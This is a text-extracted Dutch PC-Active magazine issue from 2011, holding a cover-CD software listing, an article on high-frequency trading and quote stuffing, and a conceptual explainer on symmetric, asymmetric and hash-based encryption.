VOLLEDIGE VERSIE: SMARTKITE SNIPCLIK 3 T.W.V. € 29 Wie een berg foto’s heeft geïmporteerd, kent het probleem dat het niet altijd even makkelijk is om aan een groep foto’s een bepaald kenmerk toevoegen. Bijvoorbeeld de plaats of het land waar de foto is gemaakt, wie er op de foto’s staan of welke leeftijd de mensen op de foto’s hebben. SnipClik is een eenvoudig en simpel te bedienen programma voor het maken van geotags, het toevoegen van extra informatie aan en het verzenden van uw digitale foto’s. Ook kunt u snel watermerken toevoegen aan uw foto’s en bijvoorbeeld leeftijden opgeven van degene die op de foto staat. En dat allemaal met een paar muisklikken! Deze versie van SnipClik 3 ter waarde van € 29 is geheel gratis voor PC-Active-lezers. Bovendien ontvangt u een korting van € 11 op de aanschaf van SnipClik 4.
GRATIS: CCLEANER 3.03 Het is bekend dat Windows na verloop van tijd vervuild raakt met ongebruikte bestanden, oude regis-
66
tersleutels en bestandsverwijzingen die nergens meer naar toe leiden. Met CCleaner kunt u van tijd tot tijd uw Windows-systeem opschonen, zodat deze weer optimaal functioneert. Het programma controleert het Windows-systeem op verschillende punten op vervuiling. Als eerste wordt de (tijdelijke) internetgeschiedenis gecontroleerd en de daarbij behorende bestanden, recentelijk ingetypte url’s en gedownloade bestanden. Daarna worden snelkoppelingen in de Windows Verkenner en het start menu gecontroleerd, laatst uitgevoerde opdrachten van Windows en de bestanden-cache. Ten slotte controleert CCleaner het Windows register op fouten in de database. Na het opruimen is uw Windows-systeem weer schoon en werkt het weer vlot.
GRATIS: PAINT.NET Paint.NET is een uitgebreide gratis grafische editor voor Windows. Het pakket biedt voldoende functionaliteit voor het bewerken van foto’s en afbeeldingen. Paint.NET is ontwikkeld door een ex-werknemer van Microsoft, is was in begin vooral bedoeld als gratis
PC-ACTIVE | Nr. 245 – 2011
102 Inhoud cd.indd 66
10-02-2011 14:25:28
CD
| INHOUD
E
vervanger van het in Windows aanwezige Paint. Het programma is de laatste jaren echter uitgegroeid tot een volwassen grafisch bewerkingspakket en al die tijd gratis gebleven. Het grote voordeel van Paint.NET is dat het programma weinig schijfruimte en geheugen in beslag neemt. Desondanks is het programma krachtig genoeg om de meest voorkomende taken uit te voeren voor het bewerken van afbeeldingen en foto’s. Voor het bewerken van foto’s levert Paint.NET een aantal handige tools mee, zoals diverse kleurenfilters en natuurlijk de bekende rode-ogen-verwijderaar. Daarnaast kunt u Paint.NET natuurlijk ook inzetten voor het maken van tekeningen, want ook daarvoor wordt voldoende gereedschap meegeleverd. Paint.NET is beschikbaar in zowel een 32-bits- als 64-bits Windows-versie.
GRATIS: PARAGON RESCUE KIT 10 FREE EDITION Bij problemen met Windows en voornamelijk het opstarten daarvan, kunt u nog wel eens met de handen in het haar zitten. Want, wat moet je doen als Windows niet meer wil starten? Met Paragon Rescue Kit Free Edition 10 kunt u – door het maken van een opstartbare cd-rom of dvd – uw pc opstarten en backups maken van uw bestanden . Ook kunt u de opstartpartities van de harde schijf controleren op fouten en deze herstellen.
dan voorheen. Bovendien is de compatibiliteit verder aangepast, zodat u ook documenten van bijvoorbeeld Microsoft Office eenvoudig kunt openen en in het Office-formaat kunt opslaan. Daarbij wordt ook het nieuwe ODF-formaat ondersteund. De nieuwe versie van OpenOffice 3.3.0 is voorzien van een uitgebreide helpfunctie, waarin ondermeer wordt uitgelegd hoe u macro’s kunt programmeren. Dankzij de SnelStartfunctie in het systeemvak van Windows kunt u snel nieuwe OpenOffice-documenten aanmaken.
GRATIS: EVERNOTE 4.2.1 Evernote is een applicatie waarmee u online uw notities, creaties en ideeën kunt opslaan. Zo heeft u al uw documenten altijd bij de hand, ongeacht waar u bent, want ze worden in de ‘cloud’ opgeslagen. Evernote werkt als het ware als een online kladblok: Alles wat in u opkomt en wilt noteren kunt u via deze applicatie - die direct in verbinding staat met uw online omgeving - bewaren. Bij alle notities is het tevens mogelijk om documenten te koppelen, die eveneens in de beveiligde internetomgeving worden opgeslagen. Om van Evernote gebruik te maken, moet u eerst een gratis account aanmaken. Dit is mogelijk nadat de software op uw pc is geïnstalleerd.
GRATIS: OPENOFFICE 3.3.0 OpenOffice.org is al jarenlang het beste alternatief voor betaalde kantoorpakketten. Onlangs is versie 3.3.0 geïntroduceerd, die op veel gebieden is vernieuwd en meer compatibiliteit heeft met onder meer Microsoft Office-documenten. OpenOffice 3.3.0 bestaat uit zes afzonderlijke programma’s waarmee u verschillende documenten kunt creëren. Zo kunt u met Writer documenten schrijven, is Calc bedoeld om spreadsheets en geavanceerde rekenformules te maken en kunt u met Impress gelikte presentaties maken. Alle afzonderlijke applicaties zijn verder geoptimaliseerd en werken hierdoor een stuk sneller
PC-ACTIVE | Nr. 245 – 2011
102 Inhoud cd.indd 67
67
10-02-2011 14:26:24
BEURSHANDELAREN OP DE ACHTERGROND
COMPUTERS WINNEN VAN ONS IN SNELHEID TEKST : KOEN VERVLOESEM
De beurs is al lang niet meer het terrein van de mens: heel wat computerprogramma’s bekijken tientallen keren per seconde de positie van aandelen en handelen veel sneller dan een mens nog kan denken. High-frequency trading en algorithmic trading zijn twee controversiële ontwikkelingen die profiteren van de Wet van Moore.
O
ver de gevaren van geautomatiseerde beurshandelaars leest u in de rubriek Abort, Retry, Fail! (zie pagina 14). In dat artikel hebben we het over de flash crash van 6 mei 2010 die werd verergerd door een kettingreactie van op elkaar reagerende computerprogramma’s. In 2009 werden naar schatting 73 % van de aandelentransacties in de Verenigde Staten uitgevoerd door high-frequency trading firms, bedrijven die algoritmes enorm snel aandelen laten verhandelen, en dat terwijl deze high-frequency trading firms slechts zo’n 2 % van het totaal aantal trading firms in de VS uitmaken. High-frequency traders zijn er de oorzaak van dat in 2010 de gemiddelde tijd dat een aandeel vastgehouden wordt nog slechts 22 seconden is. Algorithmic trading, zoals het verhandelen van beursaandelen door autonoom werkende computerprogramma’s heet, is geen nieuwigheid. In het begin van de jaren zeventig werden computers op de beursvloer geïntroduceerd, maar dan vooral als hulpmiddel voor de traders. Al vlug werden computerprogramma’s ontwikkeld die automatisch op basis van een prijsmodel met allerlei parameters beslissen om bepaalde aandelen te kopen of te verkopen. Op zich was dit geen slechte ontwikkeling: computers maakten het mogelijk om efficiënter op de beurs te handelen, wat de economie alleen maar ten goede kan komen. Een strategie voor een algoritmische beurshandelaar kan op heel wat manieren worden bepaald. Sommige gebruiken eenvoudige statistieken om te voorspellen welke aandelen het goed gaan doen, andere gebruiken complexere speltheoretische concepten of patroonherkenning. Het genereren van een beursalgoritme
68
kan ook gebeuren door middel van een neuraal netwerk (zie PC-Active 206) of genetische algoritmes (zie PCActive 223). Niet al deze algoritmes zijn even inzichtelijk: terwijl menselijke beurshandelaars vertrouwen op hun kennis van de markten, van economische en politieke gebeurtenissen in de wereld, van seizoenstrends, enzovoorts, zijn deze beursalgoritmes vaak een ‘black box’: u geeft een aantal getallen in, en er komt een aantal getallen uit. Waarom het algoritme specifieke beslissingen neemt, kunt u vaak niet afleiden. En daarmee ontwikkelen de beurskoersen zich steeds meer omwille van beslissingen die niemand begrijpt. Terwijl beurskenners een grote gebeurtenis zoals een krach achteraf meestal wel (denken te) kunnen verklaren, is dat bij een crash als gevolg van algorithmic trading veel minder het geval, denk maar aan de flash crash. En dat is natuurlijk heel eng. Nog enger is dat zo’n krach als gevolg van algorithmic trading bijna niet tegen te houden is eens de bal aan het rollen is. De kettingreactie van algoritmes die op elkaar reageren en aandelen dumpen, is volledig geautomatiseerd en kan enkel stoppen als alle trading firms met handelende computerprogramma’s hun programma’s uitschakelen, of alle beurshandel een tijdje stopgezet wordt zoals bij de flash crash is gebeurd. Snel reageren is daarbij de boodschap.
High-frequency trading Met het sneller worden van de computers en de netwerkverbindingen, zochten heel wat op de beurs handelende bedrijven bovendien de grenzen op van
PC-ACTIVE | Nr. 245 – 2011
502 denkwerk.indd 68
10-02-2011 14:28:11
| ACHTERGROND
(bron: Nanex)
DENKWERK
‘The Knife’
strategie tegen het einde van de dag veel winst worden gemaakt. Maar de winst die een bedrijf met highfrequency trading maakt, heeft niets meer te maken met een goed inzicht in de reële economie: het is gewoon een gevolg van de snelheid van de computer en de efficiëntie van het algoritme om extreem kort durende onregelmatigheden in vraag en aanbod uit te buiten. Snelheid is uiteraard enorm belangrijk voor highfrequency trading. Niet alleen de snelheid van de processor om zoveel mogelijk gegevens door te rekenen, maar ook de snelheid van de netwerkverbinding. Een microseconde later kan de positie van een bepaald aandeel al minder interessant zijn, en de vertraging tussen het verzenden van een aankoopopdracht op basis van positieve informatie over het aandeel en het aankomen van de aankoopopdracht bij de beurscomputer die de opdracht uitvoert met de op dat moment geldende prijs van het aandeel kan ervoor zorgen dat de winstgevendheid volledig omgeslagen is. En als alle computers met hoge frequentie posities innemen, is degene die net iets sneller is, zwaar in het voordeel omwille van de informatie-asymmetrie. Een nanoseconde kan al het verschil maken.
(bron: Nanex)
wat ze met computers konden bereiken. En zo komen we bij high-frequency trading terecht, dat al sinds de jaren tachtig bestaat, maar eind jaren negentig echt doorbrak. Terwijl tijdens het dieptepunt van de recente economische crisis moord en brand werd geschreeuwd over de zogenaamde ‘day traders’ die posities op aandelen slechts enkele uren behouden om te speculeren, gaan deze computers veel verder: zo’n computerprogramma neemt voor een extreem korte tijd (ordegrootte van maximaal enkele seconden, soms zelfs slechts enkele microseconden) een positie in. Stel dat het computerprogramma bijvoorbeeld op een bepaald moment 100 aandelen van Microsoft (MSFT) koopt. Op dat moment gaat het algoritme zo snel de computer kan (meerdere keren per microseconde) kijken of deze positie nog interessant is. Dit algoritme vergelijkt bijvoorbeeld duizenden beurskoersen en reageert op de kleinste onregelmatigheid die het kan uitbuiten. In de praktijk kan het zo honderden keren per seconde de Microsoft-aandelen verhandelen. De winsten die het programma per aandeel behaalt, zijn heel klein, maar door de grote hoeveelheid aandelen (miljarden) en de hoge frequentie kan zo bij de juiste
15.000 orders in 11 seconden
PC-ACTIVE | Nr. 245 – 2011
502 denkwerk.indd 69
69
10-02-2011 14:28:41
ACHTERGROND
| DENKWERK
Daarom is er een ware wapenwedloop tussen highfrequency trading firms, die hun computers zo dicht mogelijk bij de handelssystemen van de beurzen willen plaatsen om de vertraging te minimaliseren, liefst met een rechtstreekse verbinding. Elke router of firewall bijvoorbeeld zorgt voor een vertraging die voor high-frequency trading al veel te hoog is. De beurshuizen zijn ook op deze kar gesprongen en gaan de laatste jaren de strijd met elkaar aan door het ontwikkelen van beursplatforms die een zo klein mogelijke vertraging voor traders aanbieden. Er zijn zelfs hardwareproducenten die zich specialiseren in computers voor de beurs. Steevast hebben deze computers 10 Gigabit Ethernet of soms gaat het zelfs om custom FPGA’s (Field Programmable Gate Arrays).
Manipulatie op microschaal
Sentimentanalyse Sinds een tijdje gaan geautomatiseerde beurshandelaren nog slimmer te werk en proberen ze net zoals menselijke beurshandelaars financieel marktnieuws te begrijpen. Zo zijn er al programma’s die nieuws
(bron: Nanex)
Allemaal goed en wel, maar op die schaal van microseconden gebeuren er ondertussen heel vreemde zaken op de beurs die we moeilijk kunnen monitoren. Onlangs sloeg Rony Kay van cPacket Networks, een bedrijf dat technologie voor netwerkmonitoring ontwikkelt, alarm: netwerkmonitoringtools kunnen gebeurtenissen in netwerkverkeer op een schaal van milliseconden detecteren, maar wat op de schaal van microseconden gebeurt, blijft voor een deel onzichtbaar. Volgens Kay is een scenario mogelijk waarbij traders een groot aantal transacties doen, waardoor de transacties van andere traders worden vertraagd. Op die manier maken ze misbruik van de enkele microseconden die ze winnen van hun concurrenten. Beursanalysebedrijf Nanex heeft vorig jaar wel heel bizarre gebeurtenissen op hoge frequenties ontdekt die wel eens bedoeld kunnen zijn om concurrenten te
vertragen. Nanex vond algoritmische handelaars die duizenden orders per seconde gaven, maar duidelijk zonder enige intentie om echt handel te drijven: de aankoop- of verkoopprijzen die ze voorstelden lagen zo ver van de marktprijs dat ze gewoon niet werden aanvaard. En sommige patronen hadden duidelijk een algoritmische oorzaak. In de beursgrafieken die we dagelijks in het financiële nieuws te zien krijgen, zijn deze patronen verborgen, maar wie weet waarnaar (en op welke tijdsschaal) hij moet zoeken, vindt zo’n patronen elke minuut. Een mogelijk doel van deze orders is zoals gezegd dat ze de vertraging voor concurrenten verhogen. Feitelijk zorgen deze orders ruis voor op het kanaal, ruis die concurrenten er uit moeten filteren als ze de juiste informatie willen uitlezen en beslissingen over aandelen willen nemen. Omdat degenen die de ruis geïntroduceerd hebben het patroon kennen, ontstaat er zo een informatieasymmetrie. Eigenlijk is het een soort denial-of-service-aanval, die ook wel ‘quote stuffing’ wordt genoemd. Hoe meer high-frequency trading firms dit gaan toepassen, hoe meer we echt een groot probleem krijgen: op een bepaald moment vindt er zoveel quote stuffing plaats, dat er opstopping op de beursnetwerken zal zijn en de echte orders er niet meer doorkomen. Nanex heeft al een aantal van deze bizarre patronen verzameld op zijn webpagina ‘Crop Circle of the Day’, inclusief uitleg.
56.000 orders voor dezelfde prijs, maar de hoeveelheid wordt telkens met 1 verhoogd
70
PC-ACTIVE | Nr. 245 – 2011
502 denkwerk.indd 70
10-02-2011 14:29:03
| ACHTERGROND
(bron: Nanex)
DENKWERK
(bron: Nanex)
Drukke scène op het beurstaferaal
Fractalachtige structuren op de beurs
analyseren, daaruit voorspellingen over de aandelen van bedrijven doen en deze info omzetten in een machineleesbare vorm die door de geautomatiseerde beurshandelaren gebruikt worden om te beslissen over de in te nemen posities. Naast nieuwsberichten lezen deze computerprogramma’s ook blogposts, tweets en Facebook-berichten. En daarbij lezen ze niet alleen de pure feiten, maar proberen ze ook meer en meer sentimenten in tekst te herkennen. Als iemand over een bedrijf schrijft met een lachebekje als ;-) of :-), dan kan dit bijvoorbeeld op goed nieuws wijzen, terwijl een :-( bij een artikel of tweet over een bedrijf op slecht nieuws wijst. Door het verzamelen van massa’s berichten over een bedrijf, kan het programma zo de algemene stemming over dit bedrijf bepalen en daaruit afleiden hoe de aandelen zullen evolueren.
Computers op de beurs High-frequency trading en algorithmic trading zullen wel altijd blijven, maar niet iedereen is er even gelukkig mee. Sommigen menen dat het de markten stabiliseert omdat het geld efficiënter doet vloeien, anderen wijzen erop dat veel algoritmische traders vuil spel spelen. Vast staat dat het door de hoge snelheid van de transacties heel moeilijk is om deze ontwikkelingen in het oog te houden. Laten we hopen dat computers geen tweede flash crash veroorzaken, nu de economie juist weer aarzelend aan het herstellen is.
INFORMATIE Crop Circle of the Day www.nanex.net/FlashCrash/CCircleDay.html
PC-ACTIVE | Nr. 245 – 2011
502 denkwerk.indd 71
71
10-02-2011 14:29:28
HOE WERKT HET EIGENLIJK?
ENCRYPTIE TEKST : KOEN VERVLOESEM
Encryptie speelt een cruciale rol in ons leven: online bankieren, bestellingen in een webwinkel, e-mailen zonder te worden afgeluisterd. Het is allemaal alleen mogelijk dankzij allerlei slimme versleutelingsalgoritmes. Daarom kijken we in dit artikel eens naar de basisprincipes van encryptie: enkele termen die u moet kennen, verschillende soorten encryptie en hun sterktes en zwakheden.
E
ncryptie is het versleutelen (coderen, encrypteren) van gegevens, zodat deze voor een buitenstaander niet gelezen kunnen worden. Dit versleutelen gebeurt met een bepaald algoritme en een sleutel die door de zender wordt gekozen. De ontvanger kan daarna die versleutelde gegevens (opnieuw met een algoritme en een sleutel) ontcijferen (decoderen, decrypteren) met als resultaat de originele gegevens. De originele gegevens worden in een vakterm ook wel plaintext genoemd, omdat het vaak om tekst gaat, zoals e-mails. De versleutelde gegevens worden ciphertext genoemd. Het doel van encryptie is altijd om gegevens te beschermen tegen meekijken door onbevoegden. Dat kan zijn voor gegevens die over een netwerk verzonden worden (bijvoorbeeld internet, het mobieletelefonienetwerk of bluetooth) of gegevens die op een medium worden opgeslagen (bijvoorbeeld een versleutelde usb-stick of harde schijf). Iets wat een encryptiealgoritme niet doet, is de identiteit of de authenticiteit van een boodschap bewijzen; daarvoor gebruikt men algoritmes voor digitale hand-
tekeningen. Er zijn heel wat verschillende soorten encryptiealgoritmes, en de belangrijkste tweedeling is die tussen symmetrische en asymmetrische. Bij een symmetrisch encryptiealgoritme gebruiken zender en ontvanger dezelfde sleutel, terwijl bij een asymmetrisch encryptiealgoritme zender en ontvanger verschillende sleutels hebben.
Symmetrische encryptie Bij een symmetrisch encryptiealgoritme gebruiken zender en ontvanger dus dezelfde sleutel. Als de ontvanger het versleutelde bericht van de zender wil lezen, moet die sleutel dus op voorhand worden uitgewisseld. Dat is natuurlijk een cruciaal moment: als iemand anders die sleutel tijdens het uitwisselen onderschept, kan hij de versleutelde communicatie afluisteren én – omdat de sleutel zowel voor het encrypteren als decrypteren kan worden gebruikt – ook zelf communicatie versleutelen, waardoor de ontvanger in de waan verkeert dat een versleuteld bericht van de zender komt in plaats van van de afluisteraar. Het is daarom belangrijk dat de sleutel uitgewisseld
Blokvercijfering met electronic codebook (ECB)
72
PC-ACTIVE | Nr. 245 – 2011
506 Encryptie.indd 72
10-02-2011 15:27:34
ENCRYPTIE
| ACHTERGROND
Blokontcijfering met electronic codebook (ECB)
wordt via een veilig kanaal dat waarborgt dat zender en ontvanger elkaars identiteit kunnen controleren en dat er geen pottenkijkers zijn. Gewoon een sleutel e-mailen is dus niet veilig genoeg; in het ideale geval ontmoeten zender en ontvanger elkaar fysiek en zonder pottenkijkers om de sleutel uit te wisselen. Dat men bij symmetrische encryptie dezelfde sleutel gebruikt voor encryptie als voor decryptie wil overigens niet zeggen dat de algoritmes voor beide stappen hetzelfde zijn. In wiskundige termen is het decryptiealgoritme de inverse van het encryptiealgo-
ritme. Symmetrische-encryptiealgoritmes bestaan in twee soorten: blokvercijfering en stroomvercijfering. Een blokalgoritme verwerkt de gegevens per blok van een vast aantal bits, bijvoorbeeld 128 bits. Een blok van 128 bits plaintext worden dan omgezet in 128 bits cipertext, en zo verder met de volgende blokken. Ook het ontcijferen gebeurt blok per blok. Lange tijd was DES (Data Encryption Standard) een bekend blokcijfer van 64 bits, ondertussen opgevolgd door AES (Advanced Encryption Standard), dat blokken van 128 bits gebruikt.
Blokvercijfering met cipher-block chaining (CBC)
Blokontcijfering met cipher-block chaining (CBC)
PC-ACTIVE | Nr. 245 – 2011
506 Encryptie.indd 73
73
10-02-2011 15:27:54
ACHTERGROND
| ENCRYPTIE
De Electronic Frontier Foundation (EFF) bouwde in 1998 een machine van 250.000 dollar die DES kon kraken
Maar wat doen we als onze gegevens langer zijn dan zo één blok? De eenvoudigste manier is dat elk blok onafhankelijk van de andere blokken wordt versleuteld. Dit wordt de electronic codebook (ECB) mode genoemd, maar die is niet zo veilig: identieke blokken plaintext worden zo omgezet in identieke blokken ciphertext, waardoor u al iets kunt afleiden over de originele gegevens. Een iets betere methode is cipher-block chaining (CBC), waarbij de versleutelde uitvoer van één blok wordt geXORd met de plaintext van het volgende blok vóór dit blok versleuteld wordt. De invoer van het eerste blok wordt dan geXORd met
Alice Large 0110101010 Random 1101110100 Number 0011011010 Key Generation Program
Public
A
Private
Bij asymmetrische encryptie genereert elke gebruiker een publieke en geheime sleutel
74
een zogenaamde initialisatievector (IV), een blok willekeurige bits. Nog complexere methodes zijn propagating cipher-block chaining (PCBC), cipher feedback (CFB), output feedback (OFB) en counter mode (CTR). De ‘modus’ waarmee een blokvercijfering wordt uitgevoerd, is heel belangrijk voor de veiligheid ervan: het naïeve ECB is zoals gezegd helemaal niet zo veilig en ook CBC is niet meer state-of-the-art. Belangrijk om te weten is dat de blokgrootte van een blokvercijfering niet per definitie gelijk is aan de sleutelgrootte: zo heeft DES bijvoorbeeld een blokgrootte van 64 bits, maar de sleutels zijn feitelijk 56 bits groot omdat de 8 pariteitsbits niet meetellen. En AES heeft een blokgrootte van 128 bits, maar heeft varianten met als sleutelgrootte 128, 192 of 256 bits. Deze worden respectievelijk aangeduid met de namen AES128, AES192 en AES256. De getallen in hun namen duiden dus niet de blokgrootte aan, maar de sleutelgrootte. BitLocker, de technologie van Microsoft om schijven in Windows te versleutelen, gebruikt standaard AES128 in CBC-mode, aangevuld met een eigen uitvinding, de ‘elephant diffuser’. Het programma TrueCrypt om schijven te versleutelen ondersteunt onder andere AES en gebruikte daarvoor in versies lager dan 4.0 CBC, maar tegenwoordig in de veiliger modus XTS. Het andere soort symmetrische-encryptiealgoritme is stroomvercijfering: hierbij worden de originele gegevens bit per bit, of byte per byte versleuteld. Het voordeel van stroomvercijfering is dat het sneller kan worden uitgevoerd dan een blokvercijfering en eenvoudigere hardware vereist. Ideaal dus om toe te passen in bijvoorbeeld mobieltjes om gesprekken te versleutelen. A5/1 en A5/2 bijvoorbeeld, de algoritmes die gebruikt worden om gsm-gesprekken te versleutelen, zijn voorbeelden van stroomvercijfering, beide met een sleutelgrootte van 64 bits.
Asymmetrische encryptie Bij een asymmetrisch encryptiealgoritme hebben zender en ontvanger elk twee sleutels: één publieke en één geheime. Elke gebruiker publiceert zijn publieke sleutel zodat iedereen deze kan opzoeken, maar houdt zijn geheime sleutel voor zich zodat enkel hij die weet. Daarom wordt dit soort encryptie ook wel eens publieke-sleutelcryptografie genoemd. De publieke en geheime sleutel van een gebruiker staan in een bepaalde wiskundige relatie met elkaar waardoor een bericht dat met de geheime sleutel gecodeerd is enkel met de bijbehorende publieke sleutel kan worden gedecodeerd en andersom. Door die wiskundige relatie kan men in principe ook de geheime sleutel afleiden uit de publieke, maar in de praktijk vergt dit enorm veel rekenwerk, waardoor dit onmogelijk is als de sleutels groot genoeg zijn. Dat is ook de reden waarom in asymmetrische cryptografie grotere sleutels worden gebruikt worden dan in symmetrische cryptografie.
PC-ACTIVE | Nr. 245 – 2011
506 Encryptie.indd 74
10-02-2011 15:28:28
nl ADS is het! O L N DOW nvoudig E R A OFTW , zo ee
ad IS S GRAT en downlo Bekijk
SNEL, VEILIG EN MAKKELI JK Categorieën Audio, foto & video Backup & herstel Ontwerp & illustratie Programmeren Brandprogramma’s Games Hobbies & home entertainement Internet tools Kinderen & onderwijs Kantoor & bedrijf Besturingssystemen & distributies Beveiliging Sociale netwerken Systeem & desktop tools
Voor Windows, Mac, Mobiel en Linux
GRATIS software downloads
GRATIS reviews
(van de experts van PCM & Computeridee)
De GOEDKOOPSTE software van Nederland
ACHTERGROND
| ENCRYPTIE
Bob Hello Alice!
Encrypt Alice's public key
6EB69570 08E03CE4
Alice Hello Alice!
Decrypt
Alice's private key
Een boodschap versleutelen gaat met de publieke sleutel van de ontvanger
Asymmetrische encryptie laat twee soorten encryptie toe, afhankelijk van welke sleutel de zender gebruikt. Als de zender een bericht versleutelt met de publieke sleutel van de bedoelde ontvanger, kan enkel die ontvanger het bericht lezen, omdat dit enkel met de bijbehorende geheime sleutel wordt ontcijferd. Anderzijds: als de zender zijn bericht codeert met zijn eigen geheime sleutel, dan kan iedereen het bericht ontcijferen met de bijbehorende publieke sleutel. Op het eerste gezicht lijkt dit zinloos: waarom iets versleutelen als toch iedereen het kan ontcijferen met de publieke sleutel? Maar deze vorm van encryptie heeft één belangrijke eigenschap: de ontvanger weet zeker dat
Alice I will pay $500
Sign (Encrypt)
Alice's private key
DFCD3454 BBEA788A
Bob I will pay $500
Verify (Decrypt)
Alice's public key
Een boodschap digitaal ondertekenen gaat met de geheime sleutel van de zender
76
het bericht afkomstig is van de zender, omdat enkel hij de geheime sleutel kent. Deze vorm van encryptie vormt dan ook de basis van digitale handtekeningen. Beide soorten encryptie worden vaak gecombineerd: de zender versleutelt zijn bericht met de publieke sleutel van de ontvanger om zeker te zijn dat enkel hij de boodschap kan lezen én met zijn eigen geheime sleutel zodat de ontvanger zeker is dat het bericht van de zender komt. Een voordeel van asymmetrische encryptie is dat de publieke sleutel in principe kan worden uitgewisseld op een onveilig kanaal. Het maakt immers niet uit dat de publieke sleutels worden onderschept door een derde: wil hij een onderschept bericht ontcijferen, dan moet hij niet alleen de publieke sleutel van de zender maar ook de geheime sleutel van de ontvanger hebben, en die wordt nergens gepubliceerd. Dat ontslaat beide gesprekspartners echter niet van de plicht om na te gaan dat de andere echt wel is wie hij beweert te zijn. Als een derde immers aan de zender (bijvoorbeeld via e-mail) wijsmaakt dat hij de ontvanger is, kan die derde aan de zender zijn publieke sleutel geven en dan het door de zender met deze sleutel geëncrypteerde bericht ontcijferen, terwijl dat bericht eigenlijk voor iemand anders bedoeld was. Een man-in-the-middle aanval is dus een groot gevaar tijdens het uitwisselen van de publieke sleutels voor asymmetrische encryptie. Het beste is dan ook om enkel tijdens een fysieke ontmoeting publieke sleutels uit te wisselen. Een praktischer aanpak is het gebruik van een certificate authority, een derde partij die vertrouwd wordt en die de identiteit van gebruikers verifieert en dan een digitaal certificaat levert dat de identiteit van een gebruiker ‘bewijst’. Dit systeem, dat voor ssl-certificaten wordt gebruikt, staat of valt natuurlijk met de mate waarin een certificaatautoriteit zijn werk serieus doet (zie ook PC-Active 240). Een andere aanpak is een ‘web of trust’ waarbij een gebruiker publieke sleutels ondertekent van gebruikers waarvan hij de identiteit heeft geverifieerd en er zo ‘schakels van vertrouwen’ ontstaan: u hebt bijvoorbeeld de identiteit van persoon X geverifieerd die de identiteit van persoon Y heeft geverifieerd, dus dan zult u er wel op kunnen vertrouwen dat de publieke sleutel van Y echt de correcte sleutel is. Dit is de aanpak van programma’s zoals PGP (Pretty Good Privacy). Een nadeel van asymmetrische encryptie is dat de sleutels veel groter (bijvoorbeeld 1.024 of 2.048 bits) moeten zijn dan bij symmetrische encryptie (vaak 128 of 256 bits) om dezelfde veiligheid tegen kraken van de sleutel te kunnen bieden. Door die grotere sleutels duren de berekeningen van de asymmetrische encryptiealgoritmes ook langer. Om versleutelde communicatie niet te traag te maken, kiest men dan vaak voor een hybride aanpak: via asymmetrische encryptie wordt een kort geheim bericht verstuurd tussen zender en ontvanger. Dat geheim bericht bevat een
PC-ACTIVE | Nr. 245 – 2011
506 Encryptie.indd 76
10-02-2011 15:28:44
ENCRYPTIE
(willekeurig gegenereerde) sleutel voor symmetrische encryptie, waarna de echte communicatie via het snellere symmetrische-encryptiealgoritme gebeurt. Die symmetrische sleutel wordt bij elke communicatie opnieuw willekeurig gegenereerd en wordt dan ook sessiesleutel genoemd, omdat ze slechts tijdelijk voor een bepaalde sessie wordt gebruikt. Op deze manier worden de voordelen van asymmetrische encryptie en symmetrische encryptie gecombineerd. Het programma PGP bijvoorbeeld gebruikt deze combinatie om e-mails te kunnen versleutelen en ondertekenen. Het bekendste voorbeeld van een asymmetrisch encryptiealgoritme is RSA, genoemd naar de drie uitvinders Rivest, Shamir en Adleman. Hierbij bestaat de publieke sleutel uit een getal n en een exponent e en de bijbehorende sleutel uit een exponent d. Het getal n is het product van twee verschillende priemgetallen p en q, en d en e zijn zo gekozen dat ze aan een bepaalde wiskundige relatie voldoen. De juiste werking is in PC-Active al enkele keren aan bod gekomen (zie ook PC-Active 206); belangrijk is hier om te weten dat een aanvaller de geheime sleutel d uit de publieke sleutel n en e kan afleiden als hij de priemgetallen p en q kent. Maar omdat het voor grote getallen n enorm veel rekenwerk vergt om die te factoriseren in hun factoren p en q, is dit praktisch onmogelijk. RSA-sleutels (het getal n) zijn daarom meestal tussen de 1.024 en 2.048 bits groot. Om op veilig te spelen, zou een RSA-sleutel minstens 2.048 bits groot moeten zijn.
Cryptografische hash-functies Een derde type van encryptie-algoritme vormt de cryptografische hash-functie. Deze neemt als invoer een boodschap van eender welke lengte en geeft als uitvoer een zogenaamde ‘hash’ van een vaste lengte (bijvoorbeeld 128 bits). Vaak wordt die uitvoer getoond in de vorm van hexadecimale cijfers. Een goede cryptografische hash-functie voldoet aan vier eigenschappen: het is praktisch niet te doen om twee boodschappen te vinden die dezelfde hash produceren, het is praktisch niet te doen om een boodschap te wijzigen zonder de hash te wijzigen, het is praktisch niet te doen om een boodschap te vinden met een gegeven hash, en het is heel eenvoudig om de hashwaarde van een gegeven boodschap te berekenen. Hash-functies worden onder andere gebruikt om de integriteit van bestanden te verifiëren. Als u bijvoorbeeld een computerprogramma downloadt van een ftp-site, kan de maker op zijn website een hashwaarde tonen die hij berekend heeft op basis van dit programma. U berekent dan de hash-waarde van dit gedownloade computerprogramma en vergelijkt of die overeenkomt met de hash-waarde die de maker op zijn website publiceert. Komen ze overeen, dan bent u zeker dat er niemand dit programma gewijzigd heeft en er een achterdeurtje in heeft gestopt. Komen de waardes niet overeen, dan kunt u dit programma
| ACHTERGROND
beter niet uitvoeren... Heel wat Linux-distributies gebruiken zo’n systeem in hun pakketbeheerders, waardoor bij het downloaden van een programma automatisch wordt geverifieerd of het wel het juiste bestand is voordat het wordt geïnstalleerd. Een andere toepassing van een hash-functie is het opslaan van wachtwoorden. Een databank die bijvoorbeeld de wachtwoorden van gebruikers van een website zomaar onversleuteld opslaat, is een goudmijn voor wie in de website kan inbreken. Maar als niet de wachtwoorden zelf maar hash-waardes worden opgeslagen, kan een inbreker hier niets mee: per definitie is het niet te doen om het wachtwoord te vinden dat overeenkomt met die gegeven hash. De loginprocedure van de website kan echter nog even eenvoudig controleren of het wachtwoord dat een gebruiker ingeeft het juiste is: het past gewoon de hash-functie op het ingegeven wachtwoord toe en vergelijkt dit met de hash-waarde van het wachtwoord van de gebruiker in de databank. Hash-functies worden ook gebruikt in combinatie met digitale handtekeningen. PGP berekent bijvoorbeeld een hash-functie van de plaintext van een e-mail, en creëert dan van deze hash een digitale handtekening door deze te encrypteren met de geheime sleutel van de zender. Dit is efficiënter dan de hele e-mail te encrypteren louter om te bewijzen dat de e-mail van de zender komt en niet gewijzigd is. Een bekende hash-functie is het 128-bits MD5, dat in de praktijk niet meer veilig is. Een andere populaire is het 160-bits SHA-1, dat veiliger is dan MD5, maar waar cryptoanalisten toch al zwakheden in ontdekt hebben. Beter is het om SHA-2 te gebruiken. Hiervan bestaan vier varianten, die het aantal bits in de uitvoer in hun naam hebben staan: SHA-224, SHA-256, SHA-384 en SHA-512.
